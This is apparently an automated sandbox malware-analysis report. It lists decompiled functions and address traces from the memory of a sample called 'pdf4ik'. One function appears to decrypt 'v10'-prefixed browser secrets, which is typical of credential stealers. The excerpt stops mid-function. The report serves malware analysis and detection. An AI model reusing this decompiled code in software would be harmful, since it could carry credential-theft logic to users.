                                        0x29da712c
                                        0x29da7138
                                        0x29da713a
                                        0x29da7141
                                        0x29da7147
                                        0x29da714c
                                        0x29da714e
                                        0x29da7155
                                        0x29da7158
                                        0x29da715d
                                        0x29da7162
                                        0x29da716a
                                        0x29da716a
                                        0x29da7172
                                        0x29da7179
                                        0x29da717e
                                        0x29da7181
                                        0x29da718b
                                        0x29da718b
                                        0x29da7181
                                        0x29da7192
                                        0x29da719c
                                        0x29da71aa
                                        0x29da71ad
                                        0x29da71b4
                                        0x29da71b7
                                        0x29da71ba
                                        0x29da71be
                                        0x29da71c2
                                        0x29da71cb
                                        0x29da71cb
                                        0x00000000
                                        0x29da71c4
                                        0x29da71c4
                                        0x29da71c7
                                        0x29da71c9
                                        0x29da71ce
                                        0x29da71ce
                                        0x29da71d5
                                        0x29da71de
                                        0x29da71e1
                                        0x29da71ef
                                        0x29da71f9
                                        0x29da71fe
                                        0x29da7200
                                        0x29da7203
                                        0x29da7208
                                        0x29da720a
                                        0x29da720a
                                        0x29da720d
                                        0x29da7210
                                        0x29da7213
                                        0x29da7218
                                        0x29da721a
                                        0x29da721a
                                        0x29da7220
                                        0x29da734d
                                        0x29da7350
                                        0x29da7353
                                        0x29da735b
                                        0x29da735e
                                        0x29da7362
                                        0x29da7377
                                        0x29da737e
                                        0x29da736e
                                        0x29da7370
                                        0x29da7372
                                        0x29da7372
                                        0x29da7384
                                        0x29da738c
                                        0x29da7397
                                        0x29da73bb
                                        0x29da73bf
                                        0x29da73d4
                                        0x29da73dc
                                        0x29da73df
                                        0x29da73e5
                                        0x29da73e5
                                        0x29da73e6
                                        0x29da73e9
                                        0x29da73ec
                                        0x29da73ec
                                        0x29da73ff
                                        0x29da7406
                                        0x29da740c
                                        0x29da7399
                                        0x29da73a9
                                        0x29da73b0
                                        0x29da73b6
                                        0x29da73b6
                                        0x29da740f
                                        0x29da7412
                                        0x29da7415
                                        0x29da741c
                                        0x29da741c
                                        0x29da7426
                                        0x29da742b
                                        0x29da7430
                                        0x29da743e
                                        0x29da743e
                                        0x29da7449
                                        0x29da7451
                                        0x29da7458
                                        0x29da745e
                                        0x29da7470
                                        0x29da7477
                                        0x29da7480
                                        0x29da749f
                                        0x29da74a6
                                        0x29da74ac
                                        0x29da74be
                                        0x29da74c5
                                        0x29da74c8
                                        0x29da74cb
                                        0x29da74ce
                                        0x29da74d1
                                        0x29da74d4
                                        0x29da74da
                                        0x29da74da
                                        0x29da74e1
                                        0x29da74e6
                                        0x29da74eb
                                        0x29da74f9
                                        0x29da74f9
                                        0x29da7501
                                        0x29da750c
                                        0x29da7513
                                        0x29da7519
                                        0x29da752b
                                        0x29da7532
                                        0x29da753b
                                        0x29da7542
                                        0x29da7545
                                        0x29da754c
                                        0x29da7551
                                        0x29da7553
                                        0x29da7553
                                        0x29da7568
                                        0x29da756f
                                        0x29da7572
                                        0x29da7575
                                        0x29da7578
                                        0x29da757b
                                        0x29da7581
                                        0x29da7581
                                        0x29da7597
                                        0x29da759e
                                        0x29da75a4
                                        0x29da75b6
                                        0x29da75bd
                                        0x29da75c3
                                        0x29da75c6
                                        0x29da75cd
                                        0x29da75d6
                                        0x29da75d9
                                        0x29da75dc
                                        0x29da75e6
                                        0x29da75ec
                                        0x29da75f1
                                        0x29da75f2
                                        0x29da75f7
                                        0x29da75f7
                                        0x29da75fc
                                        0x29da7603
                                        0x29da7606
                                        0x29da760c
                                        0x29da7611
                                        0x29da7612
                                        0x29da7617
                                        0x29da761f
                                        0x29da7627
                                        0x29da7628
                                        0x29da7629
                                        0x29da7637
                                        0x29da7226
                                        0x29da7226
                                        0x29da722b
                                        0x29da722d
                                        0x29da722d
                                        0x29da7233
                                        0x00000000
                                        0x29da7239
                                        0x29da723c
                                        0x29da723f
                                        0x29da7248
                                        0x29da725c
                                        0x29da725e
                                        0x29da7268
                                        0x29da726d
                                        0x29da7270
                                        0x29da7270
                                        0x29da7273
                                        0x29da727c
                                        0x29da7281
                                        0x29da7286
                                        0x29da724a
                                        0x29da7252
                                        0x29da7257
                                        0x29da7257
                                        0x29da7289
                                        0x29da728d
                                        0x29da72a1
                                        0x29da72a3
                                        0x29da72aa
                                        0x29da72b7
                                        0x29da72bc
                                        0x29da728f
                                        0x29da7295
                                        0x29da7295
                                        0x29da72c3
                                        0x29da72cb
                                        0x29da72d5
                                        0x29da72d7
                                        0x29da72d7
                                        0x29da72dd
                                        0x29da72e0
                                        0x29da72e2
                                        0x29da72e2
                                        0x29da72ef
                                        0x29da72f1
                                        0x29da72f3
                                        0x29da72f8
                                        0x29da7327
                                        0x29da732b
                                        0x29da7338
                                        0x29da732d
                                        0x29da7330
                                        0x29da7330
                                        0x29da733b
                                        0x29da733e
                                        0x29da7341
                                        0x29da7348
                                        0x29da734b
                                        0x00000000
                                        0x29da72fa
                                        0x29da72fa
                                        0x29da7300
                                        0x29da7303
                                        0x29da7308
                                        0x00000000
                                        0x00000000
                                        0x29da730a
                                        0x29da7315
                                        0x29da731e
                                        0x29da7320
                                        0x29da7320
                                        0x29da7321
                                        0x29da7325
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29da7325
                                        0x00000000
                                        0x29da72fa
                                        0x29da72f8
                                        0x29da7233
                                        0x29da7220
                                        0x00000000
                                        0x29da71c9

                                        APIs
                                          • Part of subcall function 29D98E50: std::_Lockit::_Lockit.LIBCPMT ref: 29D98E61
                                          • Part of subcall function 29DA7E20: std::_Lockit::_Lockit.LIBCPMT ref: 29DA7E4C
                                          • Part of subcall function 29DA7E20: std::_Lockit::_Lockit.LIBCPMT ref: 29DA7E6F
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 29DA7158
                                        • _localeconv.LIBCMT ref: 29DA71CE
                                        • _strcspn.LIBCMT ref: 29DA72EA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LockitLockit::_std::_$_localeconv_strcspn
                                        • String ID: e
                                        • API String ID: 331173946-4024072794
                                        • Opcode ID: adf4c58145c74c9bae12a399939530d53cf5d135aae27d43a113d54494a9f36e
                                        • Instruction ID: 363553ebab2c92e0edca16894593c34ca3221adcc08fe9cca27fbedd2cdf99e3
                                        • Opcode Fuzzy Hash: adf4c58145c74c9bae12a399939530d53cf5d135aae27d43a113d54494a9f36e
                                        • Instruction Fuzzy Hash: 33123875E002489FCB04CFA8C890ADEBBF5BF98300F15825DE959AB751D734AD06DBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DA6A60 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 183COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: swprintf
                                        • String ID: $$%$+
                                        • API String ID: 233258989-3202472541
                                        • Opcode ID: a18c391c237bbdfecffd1b11dee19a7451ff428f23fad18fbce60c9c34a787a4
                                        • Instruction ID: fbce258a4558cd3f4ccbfd13a67b32f6247d527864bac81a237329e8114bf22f
                                        • Opcode Fuzzy Hash: a18c391c237bbdfecffd1b11dee19a7451ff428f23fad18fbce60c9c34a787a4
                                        • Instruction Fuzzy Hash: 8F51AB77A09700EBC7059E18C9807CB7BE8EB81740F909D4DF9C0937D2E639896697D2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DA6C70 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 177COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 15%
                                        			E29DA6C70(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char _a20, signed long long _a24) {
				signed int _v8;
				long _v124;
				char _v130;
				char _v131;
				long _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				char _v145;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t59;
				signed char _t62;
				short* _t63;
				char _t71;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int _t74;
				char _t76;
				signed int _t84;
				signed int _t85;
				void* _t90;
				intOrPtr _t91;
				intOrPtr _t93;
				void* _t94;
				intOrPtr _t96;
				signed int _t97;
				signed int _t99;
				signed int _t103;
				signed int _t107;
				signed int _t113;
				signed int _t117;
				signed long long _t125;

				_t99 = (_t97 & 0xffffffc0) - 0xb4;
				_t56 =  *0x29dd5664; // 0xd9555f04
				_v8 = _t56 ^ _t99;
				_t73 = _a16;
				_v136 = _a4;
				_t59 =  *(_t73 + 0x1c);
				_t93 =  *((intOrPtr*)(_t73 + 0x18));
				_v140 = _t73;
				_t103 = _t59;
				if(_t103 <= 0 && (_t103 < 0 || _t93 == 0) && ( *(_t73 + 0x14) & 0x00002000) == 0) {
					_t93 = 6;
					_t59 = 0;
				}
				_t74 = _t59;
				_t107 = _t74;
				if(_t107 < 0 || _t107 <= 0 && _t93 <= 0x24) {
					_v144 = _t93;
				} else {
					_v144 = 0x24;
				}
				asm("cdq");
				_t94 = _t93 - _v144;
				asm("sbb ecx, edx");
				_t84 =  *(_v140 + 0x14);
				_t62 = _t84 & 0x00003000;
				_t71 = 0;
				_t90 = 0;
				if(_t62 != 0x2000) {
					_t125 = _a24;
					goto L36;
				} else {
					asm("fldz");
					asm("fcom st0, st1");
					asm("fnstsw ax");
					if((_t62 & 0x00000005) != 0) {
						_v145 = 0;
					} else {
						_v145 = 1;
						asm("fchs");
					}
					asm("fcom st0, st1");
					asm("fnstsw ax");
					_t125 =  *0x29dd0b30;
					if((_t62 & 0x00000041) != 0) {
						while(1) {
							__eflags = _t71 - 0x1388;
							if(__eflags >= 0) {
								goto L14;
							}
							_t125 = _t125 / st0;
							_t71 = _t71 + 0xa;
							asm("fxch st0, st1");
							asm("fcom st0, st2");
							asm("fnstsw ax");
							__eflags = _t62 & 0x00000041;
							if(__eflags != 0) {
								asm("fxch st0, st1");
								continue;
							}
							st0 = _t125;
							goto L20;
						}
						goto L14;
					} else {
						L14:
						st1 = _t125;
						L20:
						asm("fxch st0, st2");
						asm("fcomp st0, st1");
						asm("fnstsw ax");
						if((_t62 & 0x00000005) != 0) {
							L32:
							st1 = _t125;
							if(_v145 != 0) {
								asm("fchs");
							}
							L36:
							_v132 = 0x25;
							_t63 =  &_v131;
							if((_t84 & 0x00000020) != 0) {
								_v131 = 0x2b;
								_t63 =  &_v130;
							}
							if((_t84 & 0x00000010) != 0) {
								 *_t63 = 0x23;
								_t63 = _t63 + 1;
							}
							_t85 = _t84 & 0x00003000;
							 *_t63 = 0x2a2e;
							 *((char*)(_t63 + 2)) = 0x4c;
							_t123 = _t85 - 0x2000;
							if(_t85 != 0x2000) {
								__eflags = _t85 - 0x3000;
								if(__eflags != 0) {
									__eflags = _t85 - 0x1000;
									_t41 = _t85 != 0x1000;
									__eflags = _t41;
									_t76 = (_t74 & 0xffffff00 | _t41) + (_t74 & 0xffffff00 | _t41) + 0x65;
								} else {
									_t76 = 0x61;
								}
							} else {
								_t76 = 0x66;
							}
							 *((char*)(_t63 + 3)) = _t76;
							 *(_t99 - 8) = _t125;
							 *((char*)(_t63 + 4)) = 0;
							_push(swprintf( &_v124, 0x6c,  &_v132, _v144, _a8, _a12));
							_push(_t94);
							_push(_t90);
							_push( &_v124);
							_push(_v140);
							_push(_v136);
							E29DA70D0(_a20, _t71, _t123);
							_pop(_t91);
							_pop(_t96);
							_pop(_t72);
							return E29DADF46(_v136, _t72, _v8 ^  &((_t99 - 8)[7]), _t71, _t91, _t96);
						}
						_t113 = _t74;
						if(_t113 >= 0 && (_t113 > 0 || _t94 >= 0xa)) {
							_t125 =  *0x29dd0b28;
							while(1) {
								asm("fcom st0, st1");
								asm("fnstsw ax");
								if((_t62 & 0x00000001) != 0 || _t90 >= 0x1388) {
									break;
								}
								_t94 = _t94 + 0xfffffff6;
								asm("fxch st0, st1");
								asm("adc ecx, 0xffffffff");
								_t125 = _t125 * st2;
								_t90 = _t90 + 0xa;
								_t117 = _t74;
								if(_t117 > 0 || _t117 >= 0 && _t94 >= 0xa) {
									asm("fxch st0, st1");
									continue;
								} else {
									st1 = _t125;
									goto L32;
								}
							}
							st0 = _t125;
						}
						goto L32;
					}
				}
			}






































                                        0x29da6c76
                                        0x29da6c7c
                                        0x29da6c83
                                        0x29da6c8d
                                        0x29da6c91
                                        0x29da6c95
                                        0x29da6c99
                                        0x29da6c9d
                                        0x29da6ca1
                                        0x29da6ca3
                                        0x29da6cb4
                                        0x29da6cb9
                                        0x29da6cb9
                                        0x29da6cbb
                                        0x29da6cbd
                                        0x29da6cbf
                                        0x29da6cd2
                                        0x29da6cc8
                                        0x29da6cc8
                                        0x29da6cc8
                                        0x29da6cda
                                        0x29da6cdb
                                        0x29da6cdd
                                        0x29da6ce3
                                        0x29da6ce8
                                        0x29da6ced
                                        0x29da6cef
                                        0x29da6cf6
                                        0x29da6da8
                                        0x00000000
                                        0x29da6cfc
                                        0x29da6cfc
                                        0x29da6d01
                                        0x29da6d03
                                        0x29da6d08
                                        0x29da6d2a
                                        0x29da6d0a
                                        0x29da6d0a
                                        0x29da6d0f
                                        0x29da6d0f
                                        0x29da6d17
                                        0x29da6d19
                                        0x29da6d1b
                                        0x29da6d24
                                        0x29da6d32
                                        0x29da6d32
                                        0x29da6d38
                                        0x00000000
                                        0x00000000
                                        0x29da6d3a
                                        0x29da6d3c
                                        0x29da6d3f
                                        0x29da6d41
                                        0x29da6d43
                                        0x29da6d45
                                        0x29da6d48
                                        0x29da6d30
                                        0x00000000
                                        0x29da6d30
                                        0x29da6d4a
                                        0x00000000
                                        0x29da6d4a
                                        0x00000000
                                        0x29da6d26
                                        0x29da6d26
                                        0x29da6d26
                                        0x29da6d4c
                                        0x29da6d4c
                                        0x29da6d4e
                                        0x29da6d50
                                        0x29da6d55
                                        0x29da6d97
                                        0x29da6d9c
                                        0x29da6d9e
                                        0x29da6da0
                                        0x29da6da0
                                        0x29da6dab
                                        0x29da6dab
                                        0x29da6db0
                                        0x29da6db7
                                        0x29da6db9
                                        0x29da6dbe
                                        0x29da6dbe
                                        0x29da6dc5
                                        0x29da6dc7
                                        0x29da6dca
                                        0x29da6dca
                                        0x29da6dcb
                                        0x29da6dd1
                                        0x29da6dd6
                                        0x29da6dda
                                        0x29da6de0
                                        0x29da6de6
                                        0x29da6dec
                                        0x29da6df2
                                        0x29da6df8
                                        0x29da6df8
                                        0x29da6dfb
                                        0x29da6dee
                                        0x29da6dee
                                        0x29da6dee
                                        0x29da6de2
                                        0x29da6de2
                                        0x29da6de2
                                        0x29da6e02
                                        0x29da6e0d
                                        0x29da6e10
                                        0x29da6e31
                                        0x29da6e32
                                        0x29da6e37
                                        0x29da6e3c
                                        0x29da6e3d
                                        0x29da6e41
                                        0x29da6e44
                                        0x29da6e53
                                        0x29da6e56
                                        0x29da6e57
                                        0x29da6e62
                                        0x29da6e62
                                        0x29da6d57
                                        0x29da6d59
                                        0x29da6d62
                                        0x29da6d6c
                                        0x29da6d6c
                                        0x29da6d6e
                                        0x29da6d73
                                        0x00000000
                                        0x00000000
                                        0x29da6d7d
                                        0x29da6d80
                                        0x29da6d82
                                        0x29da6d85
                                        0x29da6d87
                                        0x29da6d8a
                                        0x29da6d8c
                                        0x29da6d6a
                                        0x00000000
                                        0x29da6d95
                                        0x29da6d95
                                        0x00000000
                                        0x29da6d95
                                        0x29da6d8c
                                        0x29da6da4
                                        0x29da6da4
                                        0x00000000
                                        0x29da6d59
                                        0x29da6d24

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: swprintf
                                        • String ID: $$%$+
                                        • API String ID: 233258989-3202472541
                                        • Opcode ID: e31ee64526ca11dfd8ceeebf474bfcdde55393f61465ff32f1af42603bf0deea
                                        • Instruction ID: d2e3c0959d7bce55847088913fdc54b2d2e0a456758155c9122e702f691a76a8
                                        • Opcode Fuzzy Hash: e31ee64526ca11dfd8ceeebf474bfcdde55393f61465ff32f1af42603bf0deea
                                        • Instruction Fuzzy Hash: BB517D77A09340DADB058B14C980B8B7FE8FF85380F90995DF9C083792E639C9669792
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D99510 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 118memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 53%
                                        			E29D99510(char* __ebx, intOrPtr __ecx, char __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v16;
				signed int _v20;
				char _v48;
				long _v52;
				intOrPtr _v56;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				int _v124;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t35;
				intOrPtr _t37;
				intOrPtr* _t39;
				intOrPtr _t40;
				long _t48;
				char* _t55;
				intOrPtr* _t57;
				intOrPtr _t74;
				intOrPtr _t75;
				char _t79;
				intOrPtr _t81;
				long _t82;
				void* _t83;
				signed int _t85;

				_t70 = __edx;
				_t56 = __ecx;
				_t55 = __ebx;
				_push(0xffffffff);
				_push(E29DC1E98);
				_push( *[fs:0x0]);
				_t34 =  *0x29dd5664; // 0xd9555f04
				_t35 = _t34 ^ _t85;
				_v20 = _t35;
				_push(_t35);
				 *[fs:0x0] =  &_v16;
				_t37 = _a8;
				_t79 = __edx;
				_t74 = __ecx;
				_v56 = _t37;
				_v52 = 0;
				if(__edx < 3 ||  *((char*)(__ecx)) != 0x76 ||  *((char*)(__ecx + 1)) != 0x31 ||  *((char*)(__ecx + 2)) != 0x30) {
					_t39 = E29D994A0(_t79, _t56, __eflags);
					_t80 = _t39;
					_t57 = _t39;
					 *((intOrPtr*)(_t55 + 0x14)) = 0xf;
					 *((intOrPtr*)(_t55 + 0x10)) = 0;
					 *_t55 = 0;
					_t30 = _t57 + 1; // 0x1
					_t70 = _t30;
					do {
						_t40 =  *_t57;
						_t57 = _t57 + 1;
						__eflags = _t40;
					} while (_t40 != 0);
					__eflags = _t57 - _t70;
					E29D892C0(_t55, _t80, _t57 - _t70);
				} else {
					if(_a4 == 0 || _t37 == 0) {
						L9:
						E29D89100(_t55, "NULL");
					} else {
						E29DB5640( &_v124, 0, 0x40);
						_t11 = _t74 + 3 - 0x13; // -19
						_t82 = _t79 + 0xffffffe1;
						_v124 = 0x40;
						_v120 = 1;
						_v116 = _t74 + 3;
						_v112 = 0xc;
						_v100 = _t79 + _t11;
						_v96 = 0x10;
						_v52 = _t82;
						_t83 = LocalAlloc(0x40, _t82);
						if(_t83 == 0) {
							goto L9;
						} else {
							_t48 = _v52;
							_push(0);
							_push( &_v52);
							_t70 = _v112 + _v116;
							_push(_t48);
							_push(_t83);
							_push(0);
							_push(0);
							_push( &_v124);
							_push(_t48);
							_push(_v112 + _v116);
							_push(_v56);
							if( *0x29dd8568() < 0) {
								goto L9;
							} else {
								E29DA08C0(_v52, _t83,  &_v48);
								_v8 = 0;
								E29D89140(__ebx);
								E29D89160( &_v48);
							}
						}
					}
				}
				 *[fs:0x0] = _v16;
				_pop(_t75);
				_pop(_t81);
				return E29DADF46(_t55, _t55, _v20 ^ _t85, _t70, _t75, _t81);
			}
































                                        0x29d99510
                                        0x29d99510
                                        0x29d99510
                                        0x29d99513
                                        0x29d99515
                                        0x29d99520
                                        0x29d99524
                                        0x29d99529
                                        0x29d9952b
                                        0x29d99530
                                        0x29d99534
                                        0x29d9953a
                                        0x29d9953d
                                        0x29d9953f
                                        0x29d99541
                                        0x29d99544
                                        0x29d9954e
                                        0x29d99630
                                        0x29d99635
                                        0x29d99637
                                        0x29d99639
                                        0x29d99640
                                        0x29d99647
                                        0x29d9964a
                                        0x29d9964a
                                        0x29d99650
                                        0x29d99650
                                        0x29d99652
                                        0x29d99653
                                        0x29d99653
                                        0x29d99657
                                        0x29d9965d
                                        0x29d99571
                                        0x29d99575
                                        0x29d99620
                                        0x29d99627
                                        0x29d99583
                                        0x29d9958b
                                        0x29d99593
                                        0x29d9959a
                                        0x29d995a0
                                        0x29d995a7
                                        0x29d995ae
                                        0x29d995b1
                                        0x29d995b8
                                        0x29d995bb
                                        0x29d995c2
                                        0x29d995cb
                                        0x29d995cf
                                        0x00000000
                                        0x29d995d1
                                        0x29d995d1
                                        0x29d995d4
                                        0x29d995d9
                                        0x29d995dd
                                        0x29d995e0
                                        0x29d995e1
                                        0x29d995e2
                                        0x29d995e4
                                        0x29d995e9
                                        0x29d995ed
                                        0x29d995ee
                                        0x29d995ef
                                        0x29d995f8
                                        0x00000000
                                        0x29d995fa
                                        0x29d99602
                                        0x29d9960b
                                        0x29d99612
                                        0x29d99619
                                        0x29d99619
                                        0x29d995f8
                                        0x29d995cf
                                        0x29d99575
                                        0x29d99667
                                        0x29d9966f
                                        0x29d99670
                                        0x29d9967e

                                        APIs
                                        • _memset.LIBCMT ref: 29D9958B
                                        • LocalAlloc.KERNEL32(00000040,-000000E1,D9555F04), ref: 29D995C5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocLocal_memset
                                        • String ID: @$NULL
                                        • API String ID: 52611349-3099716844
                                        • Opcode ID: 2508f4ffecd1698c4cb3052b9f462fa739ec3b3216cbf8f1d5aec9c45930e5b0
                                        • Instruction ID: 014d5456eeb9db1d7e1499313a75e9fb5a21ac22ee1088365f1f53e0c452c328
                                        • Opcode Fuzzy Hash: 2508f4ffecd1698c4cb3052b9f462fa739ec3b3216cbf8f1d5aec9c45930e5b0
                                        • Instruction Fuzzy Hash: A9410671E14214ABEB14DF64CC44FAEBBB8FF44790F10822DE905EB681DB759906DB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D97B00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 111COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 68%
                                        			E29D97B00(intOrPtr* _a4, signed int _a8, signed int _a12) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t38;
				intOrPtr* _t41;
				intOrPtr* _t42;
				unsigned int _t51;
				intOrPtr* _t52;
				unsigned int _t55;
				void* _t56;
				signed int _t57;
				intOrPtr* _t70;
				signed int _t74;
				signed int _t79;
				intOrPtr _t80;

				_push(0xffffffff);
				_push(E29DC1F20);
				_push( *[fs:0x0]);
				_t80 = _t79 - 0x14;
				_push(_t51);
				_t35 =  *0x29dd5664; // 0xd9555f04
				_push(_t35 ^ _t79);
				 *[fs:0x0] =  &_v16;
				_v20 = _t80;
				_t38 = _a8;
				_t70 = _a4;
				_t74 = _t38 | 0x00000007;
				if(_t74 <= 0x7ffffffe) {
					_t51 =  *(_t70 + 0x14);
					_t55 = _t51 >> 1;
					_t64 = 0xaaaaaaab * _t74 >> 0x20 >> 1;
					__eflags = _t55 - 0xaaaaaaab * _t74 >> 0x20 >> 1;
					if(__eflags > 0) {
						_t74 = _t55 + _t51;
						__eflags = _t51 - 0x7ffffffe - _t55;
						if(__eflags > 0) {
							_t74 = 0x7ffffffe;
						}
					}
				} else {
					_t74 = _t38;
				}
				_t41 = 0;
				_t11 = _t74 + 1; // 0x7fffffff
				_t56 = _t11;
				_v8 = 0;
				if(_t56 <= 0) {
					L8:
					_t52 = _t41;
					_t57 = _a12;
					if(_t57 != 0) {
						if( *(_t70 + 0x14) < 8) {
							_t42 = _t70;
						} else {
							_t42 =  *_t70;
						}
						_t41 = E29DB0010(_t52, _t42, _t57 + _t57);
						_t57 = _a12;
						_t80 = _t80 + 0xc;
					}
					if( *(_t70 + 0x14) >= 8) {
						_push( *_t70);
						_t41 = E29DADF3B();
						_t57 = _a12;
					}
					 *_t70 = _t52;
					 *(_t70 + 0x14) = _t74;
					 *(_t70 + 0x10) = _t57;
					if(_t74 >= 8) {
						_t70 = _t52;
					}
					 *((short*)(_t70 + _t57 * 2)) = 0;
					 *[fs:0x0] = _v16;
					return _t41;
				} else {
					_t85 = _t56 - 0x7fffffff;
					if(_t56 > 0x7fffffff) {
						L9:
						_v24 = 0;
						E29DAE0FC( &_v36,  &_v24);
						_v36 = 0x29dc52ac;
						E29DAFF06( &_v36, 0x29dd2028);
						_v20 = _t80;
						_v8 = 2;
						_v24 = E29D97C70(_a8 + 1, _t70, _t74);
						return E29D97BD6;
					} else {
						_t41 = E29DAE70E(_t51, _t64, _t70, _t74, _t85, _t56 + _t56);
						_t80 = _t80 + 4;
						if(0 == 0) {
							goto L9;
						} else {
							goto L8;
						}
					}
				}
			}
























                                        0x29d97b03
                                        0x29d97b05
                                        0x29d97b10
                                        0x29d97b11
                                        0x29d97b14
                                        0x29d97b17
                                        0x29d97b1e
                                        0x29d97b22
                                        0x29d97b28
                                        0x29d97b2b
                                        0x29d97b2e
                                        0x29d97b33
                                        0x29d97b3c
                                        0x29d97b42
                                        0x29d97b4e
                                        0x29d97b50
                                        0x29d97b52
                                        0x29d97b54
                                        0x29d97b5d
                                        0x29d97b60
                                        0x29d97b62
                                        0x29d97b64
                                        0x29d97b64
                                        0x29d97b62
                                        0x29d97b3e
                                        0x29d97b3e
                                        0x29d97b3e
                                        0x29d97b69
                                        0x29d97b6b
                                        0x29d97b6b
                                        0x29d97b6e
                                        0x29d97b73
                                        0x29d97b8c
                                        0x29d97b8c
                                        0x29d97bdf
                                        0x29d97be4
                                        0x29d97bea
                                        0x29d97bf0
                                        0x29d97bec
                                        0x29d97bec
                                        0x29d97bec
                                        0x29d97bf7
                                        0x29d97bfc
                                        0x29d97bff
                                        0x29d97bff
                                        0x29d97c06
                                        0x29d97c0a
                                        0x29d97c0b
                                        0x29d97c10
                                        0x29d97c13
                                        0x29d97c16
                                        0x29d97c18
                                        0x29d97c1b
                                        0x29d97c21
                                        0x29d97c23
                                        0x29d97c23
                                        0x29d97c27
                                        0x29d97c2e
                                        0x29d97c3c
                                        0x29d97b75
                                        0x29d97b75
                                        0x29d97b7b
                                        0x29d97b90
                                        0x29d97b97
                                        0x29d97b9e
                                        0x29d97bac
                                        0x29d97bb3
                                        0x29d97bbe
                                        0x29d97bc4
                                        0x29d97bcd
                                        0x29d97bd5
                                        0x29d97b7d
                                        0x29d97b80
                                        0x29d97b85
                                        0x29d97b8a
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d97b8a
                                        0x29d97b7b

                                        APIs
                                        • std::exception::exception.LIBCMT ref: 29D97B9E
                                          • Part of subcall function 29DAE0FC: std::exception::_Copy_str.LIBCMT ref: 29DAE117
                                        • __CxxThrowException@8.LIBCMT ref: 29D97BB3
                                          • Part of subcall function 29DAFF06: RaiseException.KERNEL32(29D89803,00000001,D9555F04,29DC52AC,29D89803,00000001,29DD2028,29D851F1,D9555F04), ref: 29DAFF48
                                          • Part of subcall function 29D97C70: std::exception::exception.LIBCMT ref: 29D97CA2
                                          • Part of subcall function 29D97C70: __CxxThrowException@8.LIBCMT ref: 29D97CB7
                                        • _memmove.LIBCMT ref: 29D97BF7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaise_memmovestd::exception::_
                                        • String ID: )
                                        • API String ID: 163498487-2427484129
                                        • Opcode ID: f9af097d8548294e687d1fa907a26f84f02313cbf5794f453ce467c0d314f74b
                                        • Instruction ID: d5896283b4ed4fcfce2df443efa14301e8ccd5609e2a289106ae9e88bb9668d2
                                        • Opcode Fuzzy Hash: f9af097d8548294e687d1fa907a26f84f02313cbf5794f453ce467c0d314f74b
                                        • Instruction Fuzzy Hash: 7741CBB1A10115EBDB04DF68C890A9EB7F4FF54654F10462DE81797B80EB30A915D7A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D893C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 86COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 60%
                                        			E29D893C0(intOrPtr* __ecx, signed int _a4) {
				intOrPtr _v8;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* __edi;
				void* __esi;
				signed int _t29;
				intOrPtr _t36;
				intOrPtr _t37;
				signed int _t51;
				intOrPtr _t59;
				signed int _t77;
				intOrPtr* _t82;
				signed int _t84;
				void* _t85;

				_push(0xffffffff);
				_push(E29DC22F0);
				_push( *[fs:0x0]);
				_t29 =  *0x29dd5664; // 0xd9555f04
				_push(_t29 ^ _t84);
				 *[fs:0x0] =  &_v16;
				_v20 = _t85 - 8;
				_t82 = __ecx;
				_t77 = _a4;
